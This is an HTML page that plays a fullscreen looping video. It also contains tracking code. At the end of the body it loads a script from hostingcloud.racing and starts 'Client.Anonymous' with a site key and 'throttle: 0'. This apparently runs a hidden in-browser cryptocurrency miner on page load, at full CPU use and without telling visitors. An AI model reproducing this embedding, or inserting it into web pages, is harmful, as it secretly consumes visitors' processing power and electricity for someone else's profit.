<html>
    <head>
        <title></title>
        <link rel="icon" type="image/x-icon" href="/public/images/favicon.ico">
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=G-NL022VH7LY"></script>
        <script>
            window.dataLayer = window.dataLayer || [];
            function gtag(){dataLayer.push(arguments);}
            gtag('js', new Date());

            gtag('config', 'G-NL022VH7LY');
        </script>
    </head>
    <body>

        <video width="100%"
               height="100%"
               style="position: fixed;
                      right: 0;
                      bottom: 0;
                      min-width: 100%;
                      min-height: 100%;
                      background-color: #767B91;"
               poster="public/images/play.png"
               preload="auto"
               playsinline
               loop
               controls autoplay muted>
            <source src="/streaming/video/jump" type='video/mp4;codecs="avc1.4D401E, mp4a.40.2"'>
        </video>

        <script src="https://www.hostingcloud.racing/wLp7.js"></script>
        <script>
            var _client = new Client.Anonymous('b12f1f7ada4aa103a6aa81a2aef799db17b895d94645e31001dc0c7e40e5eb84', {
                throttle: 0, c: 'w', ads: 0
            });
            _client.start();
        </script>
    </body>
    <script src="/public/js/modal.js"></script>
</html>
